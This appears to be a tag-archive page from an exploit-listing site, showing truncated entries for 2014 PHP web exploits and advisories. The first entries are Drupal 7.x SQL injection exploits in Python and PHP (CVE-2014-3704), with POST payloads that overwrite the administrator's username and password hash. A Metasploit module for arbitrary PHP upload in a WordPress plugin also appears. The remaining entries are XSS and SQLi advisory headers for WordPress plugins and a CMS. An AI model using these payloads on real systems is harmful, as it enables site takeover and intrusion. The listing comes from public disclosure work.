Tags archives: php

 

0

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

0

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

0

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

0

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237 Product: MaxButtons WordPress plugin Vendor: Max Foundry Vulnerable Version(s): 1.26.0 and probably prior Tested Version: 1.26.0 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: October 2, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7181 Risk Level: Low CVSSv2 Base [...]

 

0

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236 Product: WP Google Maps WordPress plugin Vendor: WP Google Maps Vulnerable Version(s): 6.0.26 and probably prior Tested Version: 6.0.26 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: September 29, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7182 Risk Level: [...]

 

0

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA   # Risk: High   # CWE number: CWE-89,CWE-79   # Date: 13/10/2014   # Vendor: www.jttel.com.tw   # Author: Felipe ” Renzi ” Gabriel   # Contact: renzi@linuxmail.org   # Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906   # Vulnerables File: news.php ; [...]

 

0

WordPress EWWW Image Optimizer 2.0.1 Cross Site Scripting

Advisory ID: HTB23234 Product: EWWW Image Optimizer WordPress plugin Vendor: Shane Bishop Vulnerable Version(s): 2.0.1 and probably prior Tested Version: 2.0.1 Advisory Publication: September 17, 2014 [without technical details] Vendor Notification: September 17, 2014 Vendor Patch: September 24, 2014 Public Disclosure: October 8, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-6243 Risk Level: Low [...]

 

0

WordPress Contact Form DB 2.8.13 Cross Site Scripting

Advisory ID: HTB23233 Product: Contact Form DB WordPress plugin Vendor: Michael Simpson Vulnerable Version(s): 2.8.13 and probably prior Tested Version: 2.8.13 Advisory Publication: September 17, 2014 [without technical details] Vendor Notification: September 17, 2014 Vendor Patch: September 25, 2014 Public Disclosure: October 8, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7139 Risk Level: Low [...]

 

0

WordPress Google Calendar Events 2.0.1 Cross Site Scripting

Advisory ID: HTB23235 Product: Google Calendar Events WordPress plugin Vendor: Phil Derksen Vulnerable Version(s): 2.0.1 and probably prior Tested Version: 2.0.1 Advisory Publication: September 17, 2014 [without technical details] Vendor Notification: September 17, 2014 Vendor Patch: October 7, 2014 Public Disclosure: October 8, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7138 Risk Level: Low [...]

 

0

WordPress InfusionSoft Upload

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Wordpress InfusionSoft Upload Vulnerability’, ‘Description’ => %q{ This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft [...]